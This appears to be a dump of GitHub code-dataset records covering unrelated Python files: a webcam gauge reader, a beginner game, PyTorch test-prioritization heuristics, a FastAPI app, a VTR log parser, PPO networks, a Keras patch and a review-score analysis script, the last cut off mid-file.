cv2.line(self.img_gauge_bin,(x1,y1),(x2,y2),color=(120,120,120),thickness =1)\n angle = self.calc_angle(x1,y1,x2,y2)\n angle2 = self.angle_range(gauge,angle)\n print ('angle {:.5f} -> {:.5f}'.format(angle,angle2))\n press = g.angle_pressure(angle2)\n print ('pressure {:.2f}'.format(press))\n\n def show_img_bin(self):\n plt.imshow(self.img_gauge_bin)\n plt.show()\n \n##################################################################\n#\n##################################################################\nclass webcam_subgauge:\n \"\"\"webcam_subgage stores information needed to image processing\"\"\"\n def __init__(self, gauge : str):\n if gauge == 'B' or gauge == \"b\" :\n self.center = 171,109\n self.radius = 16\n self.ticks = -2.86, -2.04, -1.12, -0.31\n elif gauge == \"A\" or gauge == 'a' :\n self.center = 96,101\n self.radius = 17\n self.ticks = 1.55-2*np.pi, 2.61-2*np.pi, -2.65, -1.73\n else:\n print ('gauge identification invalid: {}'.format(gauge))\n raise ValueError\n def get_center(self):\n return self.center\n\n def get_radius(self):\n return self.radius\n\n def angle_pressure(self,angle):\n p = [0,5,10,15]\n if angle < self.ticks[0] or self.ticks[3] < angle:\n return -1\n return np.interp(angle,self.ticks,p)\n \n\n\n\n","repo_name":"kaz-aoki/webcam_ana","sub_path":"webcam.py","file_name":"webcam.py","file_ext":"py","file_size_in_byte":4027,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"894472052","text":"\ndef yes_no(question):\n valid = False\n while not valid:\n response = input(question).lower()\n\n if response == \"yes\" or response == \"y\":\n response = \"yes\"\n return response\n\n elif response == \"no\" or response == \"n\":\n response = \"no\"\n return response\n\n else:\n print(\"Please answer yes / no\")\n\n\ndef instructions(question):\n print(\"Here are the Instructions\")\n\n helpneed = input(question).lower().strip()\n\n if helpneed == \"Yes\" or helpneed == \"Y\":\n print(\"That's ok here you go\")\n instructions()\n\n else:\n print(\"Ok that good lets start the game\")\n\n\nmorehelp = instructions(\"are you ok with the rules? >>> Y/N\")\n\nshow_instructions = yes_no(\"Have you ever played this game before?\").lower().strip()\n\nif show_instructions == \"no\":\n instructions()\n\nelse:\n print(\"Well lets get you started then\")\n","repo_name":"JeckBleckburn/22_luckyunicorn","sub_path":"03_instructions1.py","file_name":"03_instructions1.py","file_ext":"py","file_size_in_byte":915,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"70454923687","text":"import sys\nfrom abc import abstractmethod\nfrom enum import Enum\nfrom itertools import chain\nfrom typing import Any, Dict, FrozenSet, Iterable, List, Optional, Tuple\n\nStringTuple = Tuple[str, ...]\n\n\n# Note: Keep the implementation of Relevance private to this file so\n# that it's easy to change in the future as we discover what's needed\nclass Relevance(Enum):\n HIGH = 0\n PROBABLE = 1\n UNRANKED = 2\n UNLIKELY = 3 # Not yet supported. Needs more infra to be usable\n NONE = 4 # Not yet supported. Needs more infra to be usable\n\n\nMETRIC_RELEVANCE_GROUP = \"relevance_group\"\nMETRIC_ORDER_WITHIN_RELEVANCE_GROUP = \"order_within_relevance_group\"\nMETRIC_NUM_TESTS_IN_RELEVANCE_GROUP = \"num_tests_in_relevance_group\"\nMETRIC_ORDER_OVERALL = \"order_overall\"\nMETRIC_HEURISTIC_NAME = \"heuristic_name\"\n\n\nclass TestPrioritizations:\n \"\"\"\n Describes the results of whether heuristics consider a test relevant or not.\n\n All the different ranks of tests are disjoint, meaning a test can only be in one category, and they are only\n declared at initization time.\n\n A list can be empty if a heuristic doesn't consider any tests to be in that category.\n\n Important: Lists of tests must always be returned in a deterministic order,\n otherwise it breaks the test sharding logic\n \"\"\"\n\n _test_priorities: List[StringTuple] # This list MUST be ordered by Relevance\n _original_tests: FrozenSet[str]\n\n def __init__(\n self,\n tests_being_ranked: Iterable[str], # The tests that are being prioritized.\n high_relevance: Optional[List[str]] = None,\n probable_relevance: Optional[List[str]] = None,\n unranked_relevance: Optional[List[str]] = None,\n unlikely_relevance: Optional[List[str]] = None,\n no_relevance: Optional[List[str]] = None,\n ) -> None:\n self._original_tests = frozenset(tests_being_ranked)\n\n self._test_priorities = [tuple() for _ in range(5)]\n\n self._test_priorities[Relevance.HIGH.value] = self.filter_out_extra_tests(\n high_relevance\n )\n self._test_priorities[Relevance.PROBABLE.value] = self.filter_out_extra_tests(\n probable_relevance\n )\n self._test_priorities[Relevance.UNRANKED.value] = self.filter_out_extra_tests(\n unranked_relevance\n )\n self._test_priorities[Relevance.UNLIKELY.value] = self.filter_out_extra_tests(\n unlikely_relevance\n )\n self._test_priorities[Relevance.NONE.value] = self.filter_out_extra_tests(\n no_relevance\n )\n\n # If any of the original tests were missed from the other lists, add them to the unranked_relevance list\n missing_tests = sorted(self._original_tests - set(self.get_all_tests()))\n self._test_priorities[Relevance.UNRANKED.value] = self._test_priorities[\n Relevance.UNRANKED.value\n ] + tuple(missing_tests)\n\n self.validate_test_priorities()\n\n def filter_out_extra_tests(\n self, relevance_group: Optional[List[str]]\n ) -> StringTuple:\n if not relevance_group:\n return tuple()\n return tuple(filter(lambda test: test in self._original_tests, relevance_group))\n\n def validate_test_priorities(self) -> None:\n # Ensure that the set of tests in the TestPrioritizations is identical to the set of tests passed in\n assert self._original_tests == set(\n self.get_all_tests()\n ), \"The set of tests in the TestPrioritizations must be identical to the set of tests passed in\"\n\n @staticmethod\n def _merge_tests(\n current_tests: Iterable[str],\n new_tests: Iterable[str],\n higher_pri_tests: Iterable[str],\n ) -> StringTuple:\n \"\"\"\n We append all new tests to the current tests, while preserving the sorting on the new_tests\n However, exclude any specified tests which have now moved to a higher priority list or tests\n that weren't originally in the self's TestPrioritizations\n \"\"\"\n merged_tests = [\n test\n for test in chain(current_tests, new_tests)\n if test not in higher_pri_tests\n ] # skip the excluded tests\n return tuple(dict.fromkeys(merged_tests)) # remove dupes while preseving order\n\n def integrate_priorities(self, other: \"TestPrioritizations\") -> None:\n \"\"\"\n Integrates priorities from another TestPrioritizations object.\n\n The final result takes all tests from the `self` and rearranges them based on priorities from `other`.\n If there are tests mentioned in `other` which are not in `self`, those tests are ignored.\n (For example, that can happen if a heuristic reports tests that are not run in the current job)\n \"\"\"\n assert (\n self._original_tests == other._original_tests\n ), \"Both tests should stem from the same original test list\"\n\n higher_pri_tests: List[str] = []\n for relevance, _ in enumerate(self._test_priorities):\n self._test_priorities[relevance] = TestPrioritizations._merge_tests(\n current_tests=self._test_priorities[relevance],\n new_tests=other._test_priorities[relevance],\n higher_pri_tests=higher_pri_tests,\n )\n\n # Don't let the tests we just added to the current relevance group be added to a lower relevance group\n higher_pri_tests.extend(self._test_priorities[relevance])\n\n self.validate_test_priorities()\n\n def get_all_tests(self) -> StringTuple:\n \"\"\"Returns all tests in the TestPrioritizations\"\"\"\n return tuple(test for test in chain(*self._test_priorities))\n\n def get_prioritized_tests(self) -> StringTuple:\n return self.get_high_relevance_tests() + self.get_probable_relevance_tests()\n\n def get_high_relevance_tests(self) -> StringTuple:\n return tuple(test for test in self._test_priorities[Relevance.HIGH.value])\n\n def get_probable_relevance_tests(self) -> StringTuple:\n return tuple(test for test in self._test_priorities[Relevance.PROBABLE.value])\n\n def get_unranked_relevance_tests(self) -> StringTuple:\n return tuple(test for test in self._test_priorities[Relevance.UNRANKED.value])\n\n def print_info(self) -> None:\n def _print_tests(label: str, tests: StringTuple) -> None:\n if not tests:\n return\n\n print(f\"{label} tests ({len(tests)}):\")\n for test in tests:\n if test in tests:\n print(f\" {test}\")\n\n for relevance_group, tests in enumerate(self._test_priorities):\n _print_tests(f\"{Relevance(relevance_group).name.title()} Relevance\", tests)\n\n def _get_test_relevance_group(self, test_name: str) -> Relevance:\n \"\"\"Returns the priority of a test.\"\"\"\n for relevance_group, tests in enumerate(self._test_priorities):\n if test_name in tests:\n return Relevance(relevance_group)\n\n raise ValueError(f\"Test {test_name} not found in any relevance group\")\n\n def _get_test_order(self, test_name: str) -> int:\n \"\"\"Returns the rank of the test specified by this heuristic.\"\"\"\n base_rank = 0\n\n for relevance_group_tests in self._test_priorities:\n if test_name in relevance_group_tests:\n return base_rank + relevance_group_tests.index(test_name)\n base_rank += len(relevance_group_tests)\n\n raise ValueError(f\"Test {test_name} not found in any relevance group\")\n\n def _get_test_order_within_relevance_group(self, test_name: str) -> int:\n for relevance_group_tests in self._test_priorities:\n if test_name not in relevance_group_tests:\n continue\n\n return relevance_group_tests.index(test_name)\n\n raise ValueError(f\"Test {test_name} not found in any relevance group\")\n\n def get_priority_info_for_test(self, test_name: str) -> Dict[str, Any]:\n \"\"\"Given a failing test, returns information about it's prioritization that we want to emit in our metrics.\"\"\"\n return {\n METRIC_RELEVANCE_GROUP: self._get_test_relevance_group(test_name).name,\n METRIC_ORDER_WITHIN_RELEVANCE_GROUP: self._get_test_order_within_relevance_group(\n test_name\n ),\n METRIC_NUM_TESTS_IN_RELEVANCE_GROUP: len(\n self._test_priorities[self._get_test_relevance_group(test_name).value]\n ),\n METRIC_ORDER_OVERALL: self._get_test_order(test_name),\n }\n\n\nclass AggregatedHeuristics:\n \"\"\"\n Aggregates the results across all heuristics.\n\n It saves the individual results from each heuristic and exposes an aggregated view.\n \"\"\"\n\n _heuristic_results: Dict[\n str, TestPrioritizations\n ] # Key is the Heuristic's name. Dicts will preserve the order of insertion, which is important for sharding\n\n unranked_tests: Tuple[str, ...]\n\n def __init__(self, unranked_tests: List[str]) -> None:\n self.unranked_tests = tuple(unranked_tests)\n self._heuristic_results = {}\n\n def add_heuristic_results(\n self, heuristic_name: str, heuristic_results: TestPrioritizations\n ) -> None:\n if heuristic_name in self._heuristic_results:\n raise ValueError(f\"We already have heuristics for {heuristic_name}\")\n\n self._heuristic_results[heuristic_name] = heuristic_results\n\n def get_aggregated_priorities(self) -> TestPrioritizations:\n \"\"\"\n Returns the aggregated priorities across all heuristics.\n \"\"\"\n aggregated_priorities = TestPrioritizations(\n tests_being_ranked=self.unranked_tests\n )\n\n for heuristic_results in self._heuristic_results.values():\n aggregated_priorities.integrate_priorities(heuristic_results)\n\n aggregated_priorities.print_info()\n\n return aggregated_priorities\n\n def get_test_stats(self, test: str) -> Dict[str, Any]:\n \"\"\"\n Returns the aggregated statistics for a given test.\n \"\"\"\n stats: Dict[str, Any] = {\n \"test_name\": test,\n }\n\n # Get baseline metrics assuming we didn't have any TD heuristics\n baseline_priorities = TestPrioritizations(\n tests_being_ranked=self.unranked_tests\n )\n baseline_stats = baseline_priorities.get_priority_info_for_test(test)\n baseline_stats[\"heuristic_name\"] = \"baseline\"\n stats[\"without_heuristics\"] = baseline_stats\n\n # Get metrics about the heuristics used\n heuristics = []\n\n # Figure out which heuristic gave this test the highest priority (if any)\n highest_ranking_heuristic = None\n highest_ranking_heuristic_order: int = sys.maxsize\n\n # And figure out how many heuristics suggested prioritizing this test\n num_heuristics_prioritized_by = 0\n\n for heuristic_name, heuristic_results in self._heuristic_results.items():\n metrics = heuristic_results.get_priority_info_for_test(test)\n metrics[\"heuristic_name\"] = heuristic_name\n heuristics.append(metrics)\n\n if heuristic_results._get_test_relevance_group(test) in [\n Relevance.HIGH,\n Relevance.PROBABLE,\n ]:\n num_heuristics_prioritized_by += 1\n\n # \"highest_ranking_heuristic\" should only consider heuristics that actually prioritize the test.\n # Sometimes an UNRANKED heuristic could be have an overall order above a PRIORITIZED heuristic\n # because it was randomly sorted higher initially, while the heuristic that actually prioritized it\n # used other data to determined it to be slighlty less relevant than other tests.\n if metrics[METRIC_ORDER_OVERALL] < highest_ranking_heuristic_order:\n highest_ranking_heuristic = heuristic_name\n highest_ranking_heuristic_order = metrics[METRIC_ORDER_OVERALL]\n\n stats[\"heuristics\"] = heuristics\n\n # Easier to compute here than in rockset\n stats[\"num_heuristics_prioritized_by\"] = num_heuristics_prioritized_by\n\n stats[\n \"aggregated\"\n ] = self.get_aggregated_priorities().get_priority_info_for_test(test)\n\n if highest_ranking_heuristic:\n stats[\"highest_ranking_heuristic\"] = highest_ranking_heuristic\n\n return stats\n\n\nclass HeuristicInterface:\n \"\"\"\n Interface for all heuristics.\n \"\"\"\n\n name: str\n description: str\n\n @abstractmethod\n def __init__(self, **kwargs: Dict[str, Any]) -> None:\n pass\n\n @abstractmethod\n def get_test_priorities(self, tests: List[str]) -> TestPrioritizations:\n \"\"\"\n Returns the prioritizations for the given tests.\n\n The set of test in TestPrioritizations _must_ be identical to the set of tests passed in.\n \"\"\"\n pass\n\n def __str__(self) -> str:\n return self.__class__.__name__\n","repo_name":"amd/ZenDNN-pytorch","sub_path":"tools/testing/target_determination/heuristics/interface.py","file_name":"interface.py","file_ext":"py","file_size_in_byte":13025,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"53"} +{"seq_id":"16164404999","text":"from fastapi.middleware.cors import CORSMiddleware\nfrom starlette.requests import Request\nfrom fastapi import Depends, FastAPI\nfrom sqlalchemy.orm import Session\nfrom core_fun.auth import get_current_active_user\n\nfrom orm.session import get_db\nfrom orm.session import SessionLocal\nfrom orm.utils_ORM import get_user\nfrom api_routes.routers.auth import auth_router\nfrom api_routes.routers.pois import pois_router \nfrom api_routes.routers.sois import sois_router\nfrom api_routes.routers.aois import aois_router\nfrom api_routes.routers.lois import lois_router \nimport uvicorn\n# from api.routers.projects import project_router\n# from api.routers.ingredients import ingredient_router\n# from api.routers.items import item_router\n# from api.routers.menus import menu_router\n# from api.routers.orders import order_router\n# from api.routers.ratings import rating_router\n\n# from core.auth import get_current_active_user\n# from app.db.server import create_project, add_project_to_user, get_user\n# from app.core.auth import get_current_active_leader, get_current_active_user\n\n\napp = FastAPI(docs_url=\"/api/docs\", openapi_url=\"/api\")\n\norigins = [\n \"http://localhost:3000\",\n \"http://localhost:3000/api\",\n \"http://localhost:3000/api/v1\",\n \"http://localhost:19000\",\n \"http://10.0.2.2:19000\",\n \"http://10.0.2.2:5554\",\n \"http://192.168.56.1:19000\",\n \"http://192.168.56.1:5554\",\n]\napp.add_middleware(\n CORSMiddleware,\n allow_origins=origins,\n allow_credentials=True,\n allow_methods=[\"*\"],\n allow_headers=[\"*\"],\n)\napp.middleware(\"http\")\n\n\nasync def db_session_middleware(request: Request, call_next):\n request.state.db = SessionLocal()\n response = await call_next(request)\n request.state.db.close()\n return response\n\n\n@app.get(\"/{id}\")\ndef get_by_id(id: int, db: Session = Depends(get_db)):\n\n print(\"here\", id)\n user1 = get_user(db, id)\n return user1.email\n\n\n@app.get(\"/api/v1\")\nasync def root():\n return {\"message\": \"Hello World\"}\n\n\n# Routers\n\napp.include_router(\n pois_router,\n prefix=\"/api/v1\",\n tags=[\"pois\"],\n dependencies=[Depends(get_current_active_user)],\n )\napp.include_router( \n sois_router,\n prefix=\"/api/v1\",\n tags=[\"sois\"],\n dependencies=[Depends(get_current_active_user)],\n )\napp.include_router(\n aois_router,\n prefix=\"/api/v1\",\n tags=[\"aois\"],\n dependencies=[Depends(get_current_active_user)],\n )\n\napp.include_router(\n lois_router,\n prefix=\"/api/v1\",\n tags=[\"lois\"],\n dependencies=[Depends(get_current_active_user)],\n )\n\napp.include_router(auth_router, prefix=\"/api\", tags=[\"auth\"])\n\n\nif __name__ == \"__main__\":\n uvicorn.run(\"main:app\", host=\"0.0.0.0\", port=8000, reload=True)\n\n","repo_name":"camzero94/APP_DEH_2023","sub_path":"backend/my_app/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2701,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"5378903806","text":"import os, sys\nsys.path.append(os.path.join(os.path.dirname(__file__), \"../..\"))\nimport unittest\nfrom linked_list.list_node import ListNode\nfrom linked_list.twonumbers import TwoNumbers\n\nclass TestTwoNumbers(unittest.TestCase):\n def setUp(self):\n self.func = TwoNumbers()\n\n def test_1(self):\n '''\n Input: (2 -> 4 -> 3) + (5 -> 6 -> 4)\n Output: 7 -> 0 -> 8 --- 342 + 465 = 807\n '''\n a = ListNode(2)\n a.next = ListNode(4)\n a.next.next = ListNode(3)\n b = ListNode(5)\n b.next = ListNode(6)\n b.next.next = ListNode(4)\n head = self.func.addTwoNumbers(a, b)\n cur, result = head, ''\n while cur:\n result = str(cur.val) + result\n cur = cur.next\n self.assertEqual(result, \"807\")\n\n def test_2(self):\n a = ListNode(9)\n a.next = ListNode(8)\n b = ListNode(1)\n head = self.func.addTwoNumbers(a, b)\n cur, result = head, ''\n while cur:\n result = str(cur.val) + result\n cur = cur.next\n self.assertEqual(result, \"90\")\n\n\nif __name__ == '__main__':\n unittest.main()","repo_name":"yokolet/tranquil-beach-python","sub_path":"tranquil-beach/test/linked_list_test/test_twonumbers.py","file_name":"test_twonumbers.py","file_ext":"py","file_size_in_byte":1153,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"74144769449","text":"# [389] 找不同\n\n# https://leetcode-cn.com/problems/find-the-difference/description/\n\n# * algorithms\n# * Easy (64.19%)\n# * Total Accepted: 55.1K\n# * Total Submissions: 81.9K\n# * Testcase Example: '\"abcd\"\\n\"abcde\"'\n\n# 给定两个字符串 s 和 t,它们只包含小写字母。\n\n# 字符串 t 由字符串 s 随机重排,然后在随机位置添加一个字母。\n\n# 请找出在 t 中被添加的字母。\n\n#\n\n# 示例 1:\n\n# 输入:s = \"abcd\", t = \"abcde\"\n# 输出:\"e\"\n# 解释:'e' 是那个被添加的字母。\n\n\n# 示例 2:\n\n# 输入:s = \"\", t = \"y\"\n# 输出:\"y\"\n\n\n# 示例 3:\n\n# 输入:s = \"a\", t = \"aa\"\n# 输出:\"a\"\n\n\n# 示例 4:\n\n# 输入:s = \"ae\", t = \"aea\"\n# 输出:\"a\"\n\n\n#\n\n# 提示:\n\n\n# \t0 <= s.length <= 1000\n# \tt.length == s.length + 1\n# \ts 和 t 只包含小写字母\n\n\nclass Solution(object):\n def findTheDifference0(self, s, t):\n \"\"\"\n :type s: str\n :type t: str\n :rtype: str\n \"\"\"\n sum_s = sum_t = 0\n for c in s:\n sum_s += ord(c)\n for c in t:\n sum_t += ord(c)\n return chr(sum_t - sum_s)\n\n def findTheDifference(self, s, t):\n ans = ord(t[-1])\n for i in range(len(s)):\n ans ^= ord(s[i])\n ans ^= ord(t[i])\n return chr(ans)\n","repo_name":"hedeqiang/leetcode-1","sub_path":"python/389.find-the-difference.py","file_name":"389.find-the-difference.py","file_ext":"py","file_size_in_byte":1311,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"3923167264","text":"#!/usr/bin/env python3\n\"\"\"\nModule to parse the vtr flow results.\n\"\"\"\nimport sys\nfrom pathlib import Path\nimport glob\nfrom collections import OrderedDict\n\n# pylint: disable=wrong-import-position\nsys.path.insert(0, str(Path(__file__).resolve().parent.parent))\nimport vtr\nfrom vtr import paths\n\n# pylint: enable=wrong-import-position\n\n\ndef parse_vtr_flow(arg_list):\n \"\"\"\n parse vtr flow output\n \"\"\"\n parse_path = arg_list[0]\n parse_config_file = arg_list[1]\n parse_config_file = vtr.util.verify_file(parse_config_file, \"parse config\")\n\n extra_params = arg_list[2:]\n if parse_config_file is None:\n parse_config_file = str(paths.vtr_benchmarks_parse_path)\n\n parse_patterns = vtr.load_parse_patterns(str(parse_config_file))\n\n metrics = OrderedDict()\n\n extra_params_parsed = OrderedDict()\n\n for param in extra_params:\n key, value = param.split(\"=\", 1)\n extra_params_parsed[key] = value\n print(key, end=\"\\t\")\n\n # Set defaults\n for parse_pattern in parse_patterns.values():\n metrics[parse_pattern.name()] = (\n parse_pattern.default_value() if parse_pattern.default_value() is not None else \"\"\n )\n print(parse_pattern.name(), end=\"\\t\")\n print(\"\")\n\n for key, value in extra_params_parsed.items():\n print(value, end=\"\\t\")\n\n # Process each pattern\n for parse_pattern in parse_patterns.values():\n\n # We interpret the parse pattern's filename as a glob pattern\n filepaths = glob.glob(str(Path(parse_path) / parse_pattern.filename()))\n\n if len(filepaths) > 1:\n raise vtr.InspectError(\n \"File pattern '{}' is ambiguous ({} files matched)\".format(\n parse_pattern.filename(), len(filepaths)\n ),\n len(filepaths),\n filepaths,\n )\n\n if len(filepaths) == 1:\n\n assert Path(filepaths[0]).exists\n metrics[parse_pattern.name()] = \"-1\"\n with open(filepaths[0], \"r\") as file:\n for line in file:\n while line[0] == \"#\":\n line = line[1:]\n match = parse_pattern.regex().match(line)\n if match and match.groups():\n # Extract the first group value\n metrics[parse_pattern.name()] = match.groups()[0]\n print(metrics[parse_pattern.name()], end=\"\\t\")\n else:\n # No matching file, skip\n print(\"-1\", end=\"\\t\")\n assert len(filepaths) == 0\n print(\"\")\n\n return 0\n\n\nif __name__ == \"__main__\":\n parse_vtr_flow(sys.argv[1:])\n","repo_name":"aaryangupta/pygmy-dev","sub_path":"tools/vtr-verilog-to-routing/vtr_flow/scripts/python_libs/vtr/parse_vtr_flow.py","file_name":"parse_vtr_flow.py","file_ext":"py","file_size_in_byte":2663,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"27124971403","text":"import numpy as np\nimport torch\nimport torch.nn as nn\n\nfrom dr.ppo.utils import weights_init\n\n\nclass Policy(nn.Module):\n\n def __init__(self, ob_space, ac_space, hid_size, pol_init_std):\n super().__init__()\n\n self.l_in = nn.Linear(ob_space.shape[0], hid_size)\n self.l1 = nn.Linear(hid_size, hid_size)\n self.l_out = nn.Linear(hid_size, ac_space.shape[0])\n\n self.std = nn.Parameter(torch.tensor([[pol_init_std] * ac_space.shape[0]], dtype=torch.float32))\n\n for name, c in self.named_children():\n if name == 'l_out':\n weights_init(c, 0.01)\n else:\n weights_init(c, 1.0)\n\n def forward(self, x):\n\n x = torch.tanh(self.l_in(x))\n x = torch.tanh(self.l1(x))\n mean = self.l_out(x)\n\n ac = torch.normal(mean, self.std.expand(mean.shape[0], -1))\n\n return ac, mean\n\n def neglogp(self, states, acs):\n\n _, mean = self.forward(states)\n\n ac_size = acs.size()[-1]\n\n return 0.5 * torch.sum(((acs - mean) / self.std) ** 2, dim=-1, keepdim=True) + \\\n 0.5 * np.log(2.0 * np.pi) * float(ac_size) + \\\n torch.sum(torch.log(self.std), dim=-1)\n\n def logp(self, state, ac):\n return - self.neglogp(state, ac)\n\n def prob(self, state, ac):\n return torch.exp(self.logp(state, ac))\n\n\nclass ValueNet(nn.Module):\n\n def __init__(self, ob_space, hid_size):\n super().__init__()\n\n self.l_in = nn.Linear(ob_space.shape[0], hid_size)\n self.l1 = nn.Linear(hid_size, hid_size)\n self.l_out = nn.Linear(hid_size, 1)\n\n for c in self.children():\n weights_init(c, 1.0)\n\n def forward(self, x):\n x = torch.tanh(self.l_in(x))\n x = torch.tanh(self.l1(x))\n x = self.l_out(x)\n\n return x\n","repo_name":"quanvuong/domain_randomization","sub_path":"dr/ppo/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":1818,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"53"} +{"seq_id":"25150506021","text":"class Player:\n def __init__(self, canvas_player, board, displayWin_function, one_tile_size):\n self.player = canvas_player\n self.x = board.start_position[0]\n self.y = board.start_position[1]\n self.maze = board.maze\n self.field_size = board.field_size\n self.canvas = board.canvas\n self.one_tile_size = one_tile_size\n self.displayWin = displayWin_function\n self.target = board.end_position\n\n self.won = False\n\n def move(self, dx, dy):\n new_x = self.x + dx\n new_y = self.y + dy\n\n if self.won:\n return\n\n if new_x < 0 or new_x >= self.field_size[0] or new_y < 0 or new_y >= self.field_size[1]:\n # Borders\n return\n\n if self.maze[new_y][new_x] == 0:\n # Wall\n return\n\n self.canvas.move(self.player, dx * self.one_tile_size, dy * self.one_tile_size)\n\n self.x = new_x\n self.y = new_y\n\n if new_x == self.target[0] and new_y == self.target[1]:\n self.won = True\n self.displayWin()\n","repo_name":"waleko/gde-proga","sub_path":"src/Player.py","file_name":"Player.py","file_ext":"py","file_size_in_byte":1083,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"20615157911","text":"import keras\n\n\ndef conv_output_length(input_length, filter_size,\n padding, stride, dilation=1):\n \"\"\"Determines output length of a convolution given input length.\n\n # Arguments\n input_length: integer.\n filter_size: integer.\n padding: one of `\"same\"`, `\"valid\"`, `\"full\"`.\n stride: integer.\n dilation: dilation rate, integer.\n\n # Returns\n The output length (integer).\n \"\"\"\n if input_length is None:\n return None\n assert padding in {'same', 'valid', 'full', 'causal'}\n dilated_filter_size = filter_size + (filter_size - 1) * (dilation - 1)\n if padding == 'same':\n _padding = (filter_size - 1) // 2\n return (input_length + 2 * _padding - dilated_filter_size) // stride + 1\n\n if padding == 'valid':\n output_length = input_length - dilated_filter_size + 1\n elif padding == 'causal':\n output_length = input_length\n elif padding == 'full':\n output_length = input_length + dilated_filter_size - 1\n return (output_length + stride - 1) // stride\n\n\ndef conv_compute_output_shape(self, input_shape):\n \"\"\"Compute the output dimension of a convolution.\"\"\"\n if self.data_format == 'channels_last':\n space = input_shape[1:-1]\n new_space = []\n for i in range(len(space)):\n new_dim = conv_output_length(\n space[i],\n self.kernel_size[i],\n padding=self.padding,\n stride=self.strides[i],\n dilation=self.dilation_rate[i])\n new_space.append(new_dim)\n return (input_shape[0],) + tuple(new_space) + (self.filters,)\n if self.data_format == 'channels_first':\n space = input_shape[2:]\n new_space = []\n for i in range(len(space)):\n new_dim = conv_output_length(\n space[i],\n self.kernel_size[i],\n padding=self.padding,\n stride=self.strides[i],\n dilation=self.dilation_rate[i])\n new_space.append(new_dim)\n return (input_shape[0], self.filters) + tuple(new_space)\n return None\n\n\ndef pool_compute_output_shape(self, input_shape):\n \"\"\"Compute the output dimension of a pooling.\"\"\"\n if self.data_format == 'channels_first':\n rows = input_shape[2]\n cols = input_shape[3]\n elif self.data_format == 'channels_last':\n rows = input_shape[1]\n cols = input_shape[2]\n rows = conv_output_length(rows, self.pool_size[0],\n self.padding, self.strides[0])\n cols = conv_output_length(cols, self.pool_size[1],\n self.padding, self.strides[1])\n if self.data_format == 'channels_first':\n return (input_shape[0], input_shape[1], rows, cols)\n if self.data_format == 'channels_last':\n return (input_shape[0], rows, cols, input_shape[3])\n return None\n\n\ndef patch():\n \"\"\"Apply the patches to the module.\"\"\"\n keras.layers.MaxPooling2D.compute_output_shape = pool_compute_output_shape\n keras.layers.Conv2D.compute_output_shape = conv_compute_output_shape\n","repo_name":"NVIDIA/tao_tensorflow1_backend","sub_path":"nvidia_tao_tf1/cv/ssd/models/patch_keras.py","file_name":"patch_keras.py","file_ext":"py","file_size_in_byte":3131,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"53"} +{"seq_id":"12481415715","text":"'''\nCreated on Mar 5, 2018\n\n@author: emigre459\n'''\nimport pandas as pd\nfrom collections import defaultdict\n\n\nincomplete_reviewers = defaultdict(list)\n\ndef import_data(filename):\n '''\n Imports data from EERE eXCHANGE CSV report called 'Review Details Grid.csv' and cleans it up prior to analysis.\n Returns a cleaned dataframe, with 'cleaned' here meaning that incomplete review records are expunged\n and review records with null values for the numeric rating are also removed. Also calculates the weighted\n score for each review criterion and adds a column to the DataFrame called 'Weighted Original Score' to record it.\n \n filename: str. Indicates path relative to location in which this code is used as a module.\n score_range: tuple. Format is (minimum individual score, maximum individual score). Defines the bounds of scores\n that reviewers could have used.\n ''' \n \n '''\n Assumed header format:\n FOA Number - ignored\n Submission Type - only types expected are 'Concept Paper' or 'Full Application'\n Control Number\n Topic\n Project Title\n Lead Organization\n Reviewer Full Name\n Review Status - only use entries wherein value here is \"Completed\"\n Rating Title - can be considered synonymous with \"Scoring Criterion\"\n Weaknesses\n Strengths\n Numeric Rating\n Criteria Weight (as a percentage)\n Average Overall Score for Reviewer - ignored\n Average Overall Score for Submission - ignored\n Weighted Original Score - added by this code\n '''\n \n \n #Note that there is a new row for every review criterion for every reviewer for every project \n #(so 3 reviewers on project X using 2 review criteria = 3 * 2 = 6 rows)\n df = pd.read_csv(filename, encoding = 'utf-8')\n \n \n #Let's keep a record of which reviewers didn't complete their reviews, and the control numbers of the \n #reviews in question\n #We'll format as a dict of form {reviewerName: [control1, control2, etc.]}\n \n incomp_df = df[df['Review Status'] != 'Complete']\n gpby = incomp_df.groupby(['Reviewer Full Name', 'Control Number'])\n for name, _ in gpby:\n incomplete_reviewers[name[0]].append(name[1])\n \n #Now that we know who they are, let's get rid of the offending rows to avoid confusion later\n df.drop(incomp_df.index, inplace = True)\n \n #And let's also remove any rows in which the Numeric Rating is null\n df.dropna(subset = ['Numeric Rating'], inplace = True)\n \n df['Weighted Original Score'] = df['Numeric Rating'] * df['Criteria Weight'] / 100\n \n print(\"These people didn't complete their reviews: \\n\\t{}\".format(incomplete_reviewers))\n \n return df\n\n\ndef reviewer_stats(df):\n '''\n Isolates scores from individual reviewers and returns each reviewer's mean score and standard deviation\n as a tuple of pandas Series in the format (all means, all stdevs)\n \n df: pandas DataFrame. Cleaned df of the format returned by import_data()\n '''\n \n reviewer_scores = df.groupby(['Reviewer Full Name', 'Control Number', 'Topic'])['Weighted Original Score'].sum()\n reviewer_avgs = reviewer_scores.groupby('Reviewer Full Name').mean()\n reviewer_stdevs = reviewer_scores.groupby('Reviewer Full Name').std(ddof=0)\n \n return reviewer_avgs, reviewer_stdevs\n\ndef calculate_z(row, reviewer_means, reviewer_stdDevs):\n '''\n Meant to be applied via the apply() method to a DataFrame of the same format as that output by import_data()\n to calculate the z-score for each reviewer's weighted score.\n \n row: DataFrame row. Can have individual column values called by using row[column_name]\n reviewer_means: pandas Series. Index values are unique reviewer names, element values are the average\n Weighted Scores across all of that reviewers' reviews for this program.\n reviewer_stdDevs: pandas Series. Index values are unique reviewer names, 